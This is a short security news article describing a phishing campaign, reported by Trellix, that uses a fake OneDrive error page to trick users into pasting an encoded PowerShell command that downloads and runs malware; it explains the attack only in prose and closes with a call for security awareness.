In an emerging and sophisticated phishing campaign identified by the Trellix Advanced Research Center, Microsoft OneDrive users are facing a new wave of cyber threats. This campaign employs social engineering tactics to deceive victims into executing malicious PowerShell scripts through a cleverly devised mechanism.
The scheme begins with a seemingly innocuous email that contains a malicious HTML file. Once opened, the file presents a convincing OneDrive interface, complete with a fabricated error message that falsely claims a DNS issue is obstructing file access. Users are urged to click on a “How to fix” button, which, unbeknownst to them, initiates a hidden script that quietly copies a malicious command to their clipboard.
What follows is a deceptive instruction set that leads users to open PowerShell, paste the copied command, and execute it. This command, which is partly encoded in Base64 format, performs a series of actions: it clears the DNS cache, creates a “downloads” folder on the C: drive, fetches a disguised malware archive, extracts its contents, and executes a script using AutoIt3.exe. Upon completion, a message misleadingly informs users that “the operation completed successfully, please reload the page.”
This phishing campaign predominantly leverages user trust and a sense of urgency, showcasing how attackers exploit psychological factors alongside technical tactics. The use of HTML files, embedded JavaScript, and the mimicry of legitimate error messages illustrate the lengths to which deceitful actors will go in their attempts to breach security.
The reach of this campaign is global, with potential ramifications including data breaches, financial loss, and reputational harm for both individuals and businesses. It underscores the critical need for ongoing vigilance and comprehensive security education within enterprises to shield against such increasingly sophisticated threats. By fostering awareness and reinforcing cybersecurity measures, organizations can better defend themselves against the threat posed by these cunning phishing attacks, safeguarding their sensitive information and ensuring operational integrity.
